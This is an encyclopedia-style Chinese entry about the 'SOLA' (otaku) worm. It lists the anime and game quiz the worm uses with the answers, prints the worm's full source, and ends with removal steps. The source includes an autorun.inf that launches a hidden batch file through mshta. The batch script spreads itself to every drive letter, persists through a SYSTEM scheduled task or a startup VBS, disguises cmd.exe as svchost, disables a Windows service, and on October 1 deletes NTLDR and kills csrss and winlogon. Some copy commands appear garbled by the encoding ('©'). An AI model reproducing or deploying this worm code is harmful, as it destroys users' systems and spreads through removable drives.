sola[sola(宅男病毒)]

sola[sola(宅男病毒)]

sola是一種病毒,中文名是宅男病毒,病毒會感染用戶近期打開過的(DOC,TXT,JPG)檔案,使之全部變成EXE檔案。在重啟累計次數達到50的時候,死亡問答便會被激活,同時鎖定系統,刪除NTLDR(全稱是NT Loader,是系統載入程式)。

若用戶回答問題正確,病毒恢復NTLDR,並且進入自我清除模式。

危害性

sola[sola(宅男病毒)] sola[sola(宅男病毒)]

若用戶回答失敗,則需重灌系統。問題與答案

遊戲篇

(註:一共有5個問題。只要答對兩個或兩個以上就過關。)

1.患病的男主角在醫院裡遇上患病的少女,並和她一起逃出醫院,到達了某地。這個地方盛產某種花,而女主角也喜歡這種花。傳說這種花是一個美男子被詛咒而變成的。

請問這部作品的名稱是?(8個英文字母)

2.男主角與女主角在小鎮上相遇,女主角非常喜歡恐龍,有模仿某種動物叫聲的口癖,並且女主角與n(n大於或等於618,小於或等於1321)年前某個夏天的故事有關係,這個女主角和n年前夏天故事的女主角的姓氏的第一個字都是“神”。

請寫出這部作品的名稱。(3個英文字母)

3.男主角遭遇車禍,醒來後發現世界已經變成地獄一般的景象,往昔的朋友變成了怪物。只有女主角在他的眼中才是正常的人類。於是,他守護著自己心中唯一的真實。

請寫出這部作品的女主角的名字的中文拼音。(5個字母,字母中間不要加空格。)

4.有如下詞語來描述B:很小,有薄薄的翅膀,下雨也不會被淋濕。有如下詞語來描述A:一種樂器,要靠魔力來演奏,與人聲搭配最為恰當。而C是一個一年四季都下著雨的城市,D是一所音樂學院。

請寫出故事情節中同時包含A、B、C、D的作品的中文名稱的前三個字的漢語拼音字母。(12個字母,字母中間不要加空格。)

5.在N年以後,人口暴漲。有些人就按下飛彈開關,使細菌兵器襲擊了地球,最終引起了一場惡戰。在地球上的人類已經所剩無幾的時候,有一個人為了尋找戰前人類留下的有用物品,進入了一個廢墟都市。在那裡,他遇到了一個天象館裡的禮儀機器人,並和她發生了一段故事。

這部作品名稱的中文拼音是?(11個字母。字母中間不要加空格。其中第一個字是後鼻音。)

遊戲篇答案:

1.narcissu ——(水仙)

2.air ——(air)

3.shaye ——(沙耶之歌)

4.jiaoxiangyue ——(交響樂之雨)

5.xingzhimeng ——(星之夢)

動畫篇

(註:一共有5個問題。只要答對兩個或兩個以上就過關。)

1.男主角在入學第一天就聽到女主角驚天動地的發言,並加入了女主角創建的一個社團,這個社團教室原本是文學社的,但被女主角強行占用。主要社團成員有:眼睛娘、很有氣勢的社長、有著魔鬼身材,比男主角高一個年級的吉祥物、被社長指揮得團團轉的男主角。

請問這個社團叫什麼團?(3個英文字母)

2.男主角與女主角在小鎮上相遇,女主角非常喜歡恐龍,有模仿某種動物叫聲的口癖,並且女主角與n(n大於或等於618,小於或等於1321)年前某個夏天的故事有關係,這個女主角和n年前夏天故事的女主角的姓氏的第一個字都是“神”。

請寫出這部作品的名稱(3個英文字母)

3.如果用B、C分別代表2種人或物體的名稱,那么每隔一段時間,就會有7個被B選中的人參加一種名為B戰爭的戰鬥,獲勝者可以獲得B,而C是B召喚出來的,擁有強大的力量,幫助主人為了B而戰鬥。

請問這部作品的名稱的前4個英文字母是什麼?

4.如果用A表示一個名詞,那么有一部作品的名稱為A少女,A少女們互相戰鬥,奪取對方的A之心,沒有A之心的少女會永遠沉睡,一個A少女收集齊了其他A少女的A之心之後,就有某種事情要發生。

請問A的漢語拼音字母是(8個字母)

5.有一種戰鬥機,只有神經系統接受了改造的人才能駕駛。4個孩子作為該戰鬥機的駕駛員展開訓練,3個孩子先後在事故中喪生。軍方為了給最後一個孩子作戰的理由,讓她轉入了某學校。她於一個晚上,在學校的游泳池裡遇到了男主角。後來,女主角加入了一個社團,該社團連同女主角共有4人。

這部作品名稱中有3個英文字母,請問這3個英文字母是?

動畫篇答案:

1. sos ——(涼宮春日的憂鬱)

2. air ——(air)

3. fate——(Fate/stay night)

4. qiangwei ——(薔薇少女)

5. ufo ——(伊里野的天空 UFO之夏)

SOLA原始碼

是個autorun.inf類的

autorun.inf內容如下:

[autorun]

shell\打開(&O)\command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"

shell=打開(&O)

shell\open=複製磁碟(&C)

shell\open\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"

shell\open\Default=1

shell\explore=資源管理器(&X)

shell\explore\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"

病毒會在字型目錄生成衍生物

%systemroot%\Fonts\Regedit.reg

%systemroot%\Fonts\sleep.exe

%systemroot%\Fonts\SOLA.BAT

%systemroot%\Fonts\est_type2032.fon

會在字型目錄生成個資料夾

%systemroot%\Fonts\solasetup

會在任務計畫目錄生成衍生物

%systemroot%\Tasks\Tasks.job

病毒代碼

-----

@echo off

set sola=%systemroot%\Fonts

set setup=%systemroot%\Fonts\solasetup

if not "%1"=="-USB" goto Start

start /max ..

if exist %sola%\SOLA.BAT goto End

::========================Infect==============================

:Infect

cd\

md %systemroot%\Fonts\solasetup

::————檔案複製---------

copy sola\Autorun.inf %setup%\Autorun.inf

copy sola\SOLA.BAT %setup%\SOLA.BAT

copy sola\宅男請進.RAR %setup%\宅男請進.RAR

copy sola\Tasks.xxx %setup%\Tasks.xxx

copy sola\sleep.exe %setup%\sleep.exe

tasklist >%sola%\task.txt

FOR /F "tokens=1" %%i in ('findstr /I "svchost.exe" "%sola%\task.txt"') do set svchost=%%i

copy %systemroot%\system32\cmd.exe %sola%\%svchost%

del %sola%\task.txt

:Tasks

copy %setup%\Tasks.xxx %systemroot%\Tasks\Tasks.job

schtasks /change /ru "NT AUTHORITY\SYSTEM" /tn "Tasks" & if errorlevel 1 goto TaskFail

goto TaskSuc

:TaskFail

%homedrive%

cd "%ALLUSERSPROFILE%"

cd 「開始」選單\程式\啟動

echo On Error Resume Next>SOLA.VBS

echo set ws=wscript.createobject("wscript.shell")>>SOLA.VBS

echo ws.run "%sola%\svchost.exe /c %sola%\SOLA.BAT",0 >>SOLA.VBS

copy SOLA.VBS %sola%\SOLA.VBS

echo NT>%systemroot%\Fonts\NoTasks

:TaskSuc

attrib %systemroot%\Tasks\Tasks.job +s +h +r

copy %setup%\sola.bat %sola%\sola.bat

copy %setup%\sleep.exe %systemroot%\system32\sleep.exe

:NoAutoPlay

net stop "Shell Hardware Detection"

echo Windows Registry Editor Version 5.00>%systemroot%\Fonts\Regedit.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ShellHWDetection]>>%systemroot%\Fonts\Regedit.reg

echo "Start"=dword:00000004>>%systemroot%\Fonts\Regedit.reg

start regedit /s %systemroot%\Fonts\Regedit.reg

:KillTMG

goto End

::======================Infect======================================

::======================Start=======================================

:Start

%homedrive%

cd "%ALLUSERSPROFILE%"

cd 「開始」選單\程式\啟動

date /t >%sola%\est_type2032.fon

findstr /c:"-10-01" "%sola%\est_type2032.fon" & if not errorlevel 1 goto DayOn

if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS

:Continue

sleep 300&set C=0 & echo 1>C:\solachk1 & findstr . C:\solachk1 & if not errorlevel 1 del C:\solachk1 & sleep 1000&set C=1 & findstr /C:"SOLA_1.0" C:\Autorun.inf & if errorlevel 1 attrib -s -h -r C:\Autorun.inf© /y %setup%\Autorun.inf C:\Autorun.inf&attrib C:\Autorun.inf +s +h +r&md C:\SOLA© /y "%setup%\*" C:\SOLA\*&attrib C:\SOLA +s +h +r

sleep 300&set D=0 & echo 1>D:\solachk1 & findstr . D:\solachk1 & if not errorlevel 1 del D:\solachk1 & sleep 1000&set D=1 & findstr /C:"SOLA_1.0" D:\Autorun.inf & if errorlevel 1 attrib -s -h -r D:\Autorun.inf© /y %setup%\Autorun.inf D:\Autorun.inf&attrib D:\Autorun.inf +s +h +r&md D:\SOLA© /y "%setup%\*" D:\SOLA\*&attrib D:\SOLA +s +h +r

sleep 300&set E=0 & echo 1>E:\solachk1 & findstr . E:\solachk1 & if not errorlevel 1 del E:\solachk1 & sleep 1000&set E=1 & findstr /C:"SOLA_1.0" E:\Autorun.inf & if errorlevel 1 attrib -s -h -r E:\Autorun.inf© /y %setup%\Autorun.inf E:\Autorun.inf&attrib E:\Autorun.inf +s +h +r&md E:\SOLA© /y "%setup%\*" E:\SOLA\*&attrib E:\SOLA +s +h +r

sleep 300&set F=0 & echo 1>F:\solachk1 & findstr . F:\solachk1 & if not errorlevel 1 del F:\solachk1 & sleep 1000&set F=1 & findstr /C:"SOLA_1.0" F:\Autorun.inf & if errorlevel 1 attrib -s -h -r F:\Autorun.inf© /y %setup%\Autorun.inf F:\Autorun.inf&attrib F:\Autorun.inf +s +h +r&md F:\SOLA© /y "%setup%\*" F:\SOLA\*&attrib F:\SOLA +s +h +r

sleep 300&set G=0 & echo 1>G:\solachk1 & findstr . G:\solachk1 & if not errorlevel 1 del G:\solachk1 & sleep 1000&set G=1 & findstr /C:"SOLA_1.0" G:\Autorun.inf & if errorlevel 1 attrib -s -h -r G:\Autorun.inf© /y %setup%\Autorun.inf G:\Autorun.inf&attrib G:\Autorun.inf +s +h +r&md G:\SOLA© /y "%setup%\*" G:\SOLA\*&attrib G:\SOLA +s +h +r

if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS

sleep 300&set H=0 & echo 1>H:\solachk1 & findstr . H:\solachk1 & if not errorlevel 1 del H:\solachk1 & sleep 1000&set H=1 & findstr /C:"SOLA_1.0" H:\Autorun.inf & if errorlevel 1 attrib -s -h -r H:\Autorun.inf© /y %setup%\Autorun.inf H:\Autorun.inf&attrib H:\Autorun.inf +s +h +r&md H:\SOLA© /y "%setup%\*" H:\SOLA\*&attrib H:\SOLA +s +h +r

sleep 300&set I=0 & echo 1>I:\solachk1 & findstr . I:\solachk1 & if not errorlevel 1 del I:\solachk1 & sleep 1000&set I=1 & findstr /C:"SOLA_1.0" I:\Autorun.inf & if errorlevel 1 attrib -s -h -r I:\Autorun.inf© /y %setup%\Autorun.inf I:\Autorun.inf&attrib I:\Autorun.inf +s +h +r&md I:\SOLA© /y "%setup%\*" I:\SOLA\*&attrib I:\SOLA +s +h +r

sleep 300&set J=0 & echo 1>J:\solachk1 & findstr . J:\solachk1 & if not errorlevel 1 del J:\solachk1 & sleep 1000&set J=1 & findstr /C:"SOLA_1.0" J:\Autorun.inf & if errorlevel 1 attrib -s -h -r J:\Autorun.inf© /y %setup%\Autorun.inf J:\Autorun.inf&attrib J:\Autorun.inf +s +h +r&md J:\SOLA© /y "%setup%\*" J:\SOLA\*&attrib J:\SOLA +s +h +r

sleep 300&set K=0 & echo 1>K:\solachk1 & findstr . K:\solachk1 & if not errorlevel 1 del K:\solachk1 & sleep 1000&set K=1 & findstr /C:"SOLA_1.0" K:\Autorun.inf & if errorlevel 1 attrib -s -h -r K:\Autorun.inf© /y %setup%\Autorun.inf K:\Autorun.inf&attrib K:\Autorun.inf +s +h +r&md K:\SOLA© /y "%setup%\*" K:\SOLA\*&attrib K:\SOLA +s +h +r

sleep 300&set L=0 & echo 1>L:\solachk1 & findstr . L:\solachk1 & if not errorlevel 1 del L:\solachk1 & sleep 1000&set L=1 & findstr /C:"SOLA_1.0" L:\Autorun.inf & if errorlevel 1 attrib -s -h -r L:\Autorun.inf© /y %setup%\Autorun.inf L:\Autorun.inf&attrib L:\Autorun.inf +s +h +r&md L:\SOLA© /y "%setup%\*" L:\SOLA\*&attrib L:\SOLA +s +h +r

sleep 300&set M=0 & echo 1>M:\solachk1 & findstr . M:\solachk1 & if not errorlevel 1 del M:\solachk1 & sleep 1000&set M=1 & findstr /C:"SOLA_1.0" M:\Autorun.inf & if errorlevel 1 attrib -s -h -r M:\Autorun.inf© /y %setup%\Autorun.inf M:\Autorun.inf&attrib M:\Autorun.inf +s +h +r&md M:\SOLA© /y "%setup%\*" M:\SOLA\*&attrib M:\SOLA +s +h +r

sleep 300&set N=0 & echo 1>N:\solachk1 & findstr . N:\solachk1 & if not errorlevel 1 del N:\solachk1 & sleep 1000&set N=1 & findstr /C:"SOLA_1.0" N:\Autorun.inf & if errorlevel 1 attrib -s -h -r N:\Autorun.inf© /y %setup%\Autorun.inf N:\Autorun.inf&attrib N:\Autorun.inf +s +h +r&md N:\SOLA© /y "%setup%\*" N:\SOLA\*&attrib N:\SOLA +s +h +r

if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS

sleep 300&set O=0 & echo 1>O:\solachk1 & findstr . O:\solachk1 & if not errorlevel 1 del O:\solachk1 & sleep 1000&set O=1 & findstr /C:"SOLA_1.0" O:\Autorun.inf & if errorlevel 1 attrib -s -h -r O:\Autorun.inf© /y %setup%\Autorun.inf O:\Autorun.inf&attrib O:\Autorun.inf +s +h +r&md O:\SOLA© /y "%setup%\*" O:\SOLA\*&attrib O:\SOLA +s +h +r

sleep 300&set P=0 & echo 1>P:\solachk1 & findstr . P:\solachk1 & if not errorlevel 1 del P:\solachk1 & sleep 1000&set P=1 & findstr /C:"SOLA_1.0" P:\Autorun.inf & if errorlevel 1 attrib -s -h -r P:\Autorun.inf© /y %setup%\Autorun.inf P:\Autorun.inf&attrib P:\Autorun.inf +s +h +r&md P:\SOLA© /y "%setup%\*" P:\SOLA\*&attrib P:\SOLA +s +h +r

sleep 300&set Q=0 & echo 1>Q:\solachk1 & findstr . Q:\solachk1 & if not errorlevel 1 del Q:\solachk1 & sleep 1000&set Q=1 & findstr /C:"SOLA_1.0" Q:\Autorun.inf & if errorlevel 1 attrib -s -h -r Q:\Autorun.inf© /y %setup%\Autorun.inf Q:\Autorun.inf&attrib Q:\Autorun.inf +s +h +r&md Q:\SOLA© /y "%setup%\*" Q:\SOLA\*&attrib Q:\SOLA +s +h +r

sleep 300&set R=0 & echo 1>R:\solachk1 & findstr . R:\solachk1 & if not errorlevel 1 del R:\solachk1 & sleep 1000&set R=1 & findstr /C:"SOLA_1.0" R:\Autorun.inf & if errorlevel 1 attrib -s -h -r R:\Autorun.inf© /y %setup%\Autorun.inf R:\Autorun.inf&attrib R:\Autorun.inf +s +h +r&md R:\SOLA© /y "%setup%\*" R:\SOLA\*&attrib R:\SOLA +s +h +r

sleep 300&set S=0 & echo 1>S:\solachk1 & findstr . S:\solachk1 & if not errorlevel 1 del S:\solachk1 & sleep 1000&set S=1 & findstr /C:"SOLA_1.0" S:\Autorun.inf & if errorlevel 1 attrib -s -h -r S:\Autorun.inf© /y %setup%\Autorun.inf S:\Autorun.inf&attrib S:\Autorun.inf +s +h +r&md S:\SOLA© /y "%setup%\*" S:\SOLA\*&attrib S:\SOLA +s +h +r

if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS

sleep 300&set T=0 & echo 1>T:\solachk1 & findstr . T:\solachk1 & if not errorlevel 1 del T:\solachk1 & sleep 1000&set T=1 & findstr /C:"SOLA_1.0" T:\Autorun.inf & if errorlevel 1 attrib -s -h -r T:\Autorun.inf© /y %setup%\Autorun.inf T:\Autorun.inf&attrib T:\Autorun.inf +s +h +r&md T:\SOLA© /y "%setup%\*" T:\SOLA\*&attrib T:\SOLA +s +h +r

sleep 300&set U=0 & echo 1>U:\solachk1 & findstr . U:\solachk1 & if not errorlevel 1 del U:\solachk1 & sleep 1000&set U=1 & findstr /C:"SOLA_1.0" U:\Autorun.inf & if errorlevel 1 attrib -s -h -r U:\Autorun.inf© /y %setup%\Autorun.inf U:\Autorun.inf&attrib U:\Autorun.inf +s +h +r&md U:\SOLA© /y "%setup%\*" U:\SOLA\*&attrib U:\SOLA +s +h +r

sleep 300&set V=0 & echo 1>V:\solachk1 & findstr . V:\solachk1 & if not errorlevel 1 del V:\solachk1 & sleep 1000&set V=1 & findstr /C:"SOLA_1.0" V:\Autorun.inf & if errorlevel 1 attrib -s -h -r V:\Autorun.inf© /y %setup%\Autorun.inf V:\Autorun.inf&attrib V:\Autorun.inf +s +h +r&md V:\SOLA© /y "%setup%\*" V:\SOLA\*&attrib V:\SOLA +s +h +r

sleep 300&set W=0 & echo 1>W:\solachk1 & findstr . W:\solachk1 & if not errorlevel 1 del W:\solachk1 & sleep 1000&set W=1 & findstr /C:"SOLA_1.0" W:\Autorun.inf & if errorlevel 1 attrib -s -h -r W:\Autorun.inf© /y %setup%\Autorun.inf W:\Autorun.inf&attrib W:\Autorun.inf +s +h +r&md W:\SOLA© /y "%setup%\*" W:\SOLA\*&attrib W:\SOLA +s +h +r

sleep 300&set X=0 & echo 1>X:\solachk1 & findstr . X:\solachk1 & if not errorlevel 1 del X:\solachk1 & sleep 1000&set X=1 & findstr /C:"SOLA_1.0" X:\Autorun.inf & if errorlevel 1 attrib -s -h -r X:\Autorun.inf© /y %setup%\Autorun.inf X:\Autorun.inf&attrib X:\Autorun.inf +s +h +r&md X:\SOLA© /y "%setup%\*" X:\SOLA\*&attrib X:\SOLA +s +h +r

sleep 300&set Y=0 & echo 1>Y:\solachk1 & findstr . Y:\solachk1 & if not errorlevel 1 del Y:\solachk1 & sleep 1000&set Y=1 & findstr /C:"SOLA_1.0" Y:\Autorun.inf & if errorlevel 1 attrib -s -h -r Y:\Autorun.inf© /y %setup%\Autorun.inf Y:\Autorun.inf&attrib Y:\Autorun.inf +s +h +r&md Y:\SOLA© /y "%setup%\*" Y:\SOLA\*&attrib Y:\SOLA +s +h +r

sleep 300&set Z=0 & echo 1>Z:\solachk1 & findstr . Z:\solachk1 & if not errorlevel 1 del Z:\solachk1 & sleep 1000&set Z=1 & findstr /C:"SOLA_1.0" Z:\Autorun.inf & if errorlevel 1 attrib -s -h -r Z:\Autorun.inf© /y %setup%\Autorun.inf Z:\Autorun.inf&attrib Z:\Autorun.inf +s +h +r&md Z:\SOLA© /y "%setup%\*" Z:\SOLA\*&attrib Z:\SOLA +s +h +r

if exist %systemroot%\Fonts\NoTasks if not exist SOLA.VBS copy %sola%\SOLA.VBS SOLA.VBS

%systemdrive%

sleep 5000

goto Start

:DayOn

attrib %systemdrive%\ntldr -s -h -r & del /q /a %systemdrive%\ntldr & shutdown -r -t 10 -c "您的計算機上帶有SOLA病毒,今天是它的發作日期。病毒已經破壞了您的系統,您的計算機將在10秒鐘後重啟。" & if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn csrss.exe',0);window.close()"

sleep 10000

if errorlevel 1 start mshta "javascript:new ActiveXObject('WScript.Shell').Run('ntsd -c q -pn winlogon.exe',0);window.close()"

goto Start

::=====================Start=========================================

:End

快速解決方案

發現中毒之後不必驚慌,到網上下載一個專殺軟體即可。目前網路上已經出現了多款,效果差不多的,總之很容易解決。

手工防毒

如果已經無法啟動,就進入DOS,從另一個電腦複製一份NTLDR(系統隱藏檔案,需在資料夾選項中取消“隱藏受保護的作業系統檔案”)。啟動後按下面的操作。

如果沒有重啟,不要回答問題。正確的解決方法是先啟動任務管理器,結束CMD進程。

然後接下來——千萬別打開含有病毒的磁碟!正確的做法是按下Win+R,輸入“cmd”。

接下來按照下面的命令輸入。(懶人可以去自己保存好的檔案複製)

set SOLA=

set SETUP=

del /f /s /q %systemroot%\Fonts\Regedit.reg

del /f /s /q %systemroot%\Fonts\sleep.exe

del /f /s /q %systemroot%\Fonts\SOLA.BAT

del /f /s /q %systemroot%\Fonts\est_type2032.fon

del /f /s /q %systemroot%\Fonts\RunTime.txt

del /f /s /q %systemroot%\Tasks\Tasks.job

rd /s /q %systemroot%\Fonts\solasetup

當然,還不能重啟。去下載NTLDR,把其中的NTLDR解壓到C糟根目錄。

查殺完畢。重啟.

相關詞條

熱門詞條

聯絡我們